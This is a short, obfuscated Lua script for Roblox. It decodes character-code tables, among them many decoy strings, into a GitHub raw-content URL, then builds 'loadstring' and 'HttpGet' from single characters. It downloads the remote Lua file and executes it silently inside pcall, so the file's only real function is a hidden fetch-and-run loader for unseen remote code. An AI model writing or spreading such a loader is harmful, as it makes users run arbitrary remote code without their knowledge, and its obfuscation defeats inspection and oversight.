local function _G_ObF_DeC(t)
    local r = {}
    for i = 1, #t do
        r[i] = string.char(t[i])
    end
    return table.concat(r)
end

local _SP = {
    [1] = {112,99,97,108,108},
    [2] = {108,111,97,100,115,116,114,105,110,103},
    [3] = {103,97,109,101},
    [4] = {72,116,116,112,71,101,116},
    [5] = {116,97,115,107},
    [6] = {115,112,97,119,110},
    [7] = {119,97,105,116},
    [8] = {116,121,112,101},
    [9] = {115,116,114,105,110,103},
    [10] = {116,97,98,108,101},
    [11] = {99,111,110,99,97,116},
    [12] = {99,104,97,114},
    [13] = {105,112,97,105,114,115},
    [14] = {112,97,105,114,115},
    [15] = {110,101,120,116},
    [16] = {103,101,116,109,101,116,97,116,97,98,108,101},
    [17] = {115,101,116,109,101,116,97,116,97,98,108,101},
    [18] = {114,97,119,103,101,116},
    [19] = {114,97,119,115,101,116},
    [20] = {116,111,110,117,109,98,101,114},
    [21] = {116,111,115,116,114,105,110,103},
    [22] = {109,97,116,104},
    [23] = {114,97,110,100,111,109},
    [24] = {102,108,111,111,114},
    [25] = {99,101,105,108},
    [26] = {97,98,115},
    [27] = {109,105,110},
    [28] = {109,97,120},
    [29] = {115,113,114,116},
    [30] = {115,105,110},
    [31] = {99,111,115},
    [32] = {116,97,110},
    [33] = {97,115,105,110},
    [34] = {97,99,111,115},
    [35] = {97,116,97,110},
    [36] = {100,101,103},
    [37] = {114,97,100},
    [38] = {112,105},
    [39] = {104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,107,101,101,102,48,50,49,47,107,97,107,98,100,104,100,105,97,109,110,97,105,47,109,97,105,110,47,107,97,109,110,102,110,97,111,105,97,107,46,108,117,97},
    [40] = {95,71},
    [41] = {119,111,114,107,115,112,97,99,101},
    [42] = {112,108,97,121,101,114,115},
    [43] = {108,105,103,104,116,105,110,103},
    [44] = {115,111,117,110,100,115,101,114,118,105,99,101},
    [45] = {117,115,101,114,105,110,112,117,116,115,101,114,118,105,99,101}
}

local _0xF1 = string.char(108) .. string.char(111) .. string.char(97) .. string.char(100)
local _0xF2 = string.char(115) .. string.char(116) .. string.char(114) .. string.char(105) .. string.char(110) .. string.char(103)
local _0xLoadStr = _0xF1 .. _0xF2

local _0xH1 = string.char(72) .. string.char(116) .. string.char(116) .. string.char(112)
local _0xH2 = string.char(71) .. string.char(101) .. string.char(116)
local _0xHttpMethod = _0xH1 .. _0xH2

local _0xY7Z8 = _G_ObF_DeC(_SP[39])

local function _0xProxy1(code)
    return getfenv()[_0xLoadStr](code)
end

local function _0xProxy2(url)
    return game[_0xHttpMethod](game, url)
end

pcall(function()
    _0xProxy1(_0xProxy2(_0xY7Z8))()
end)
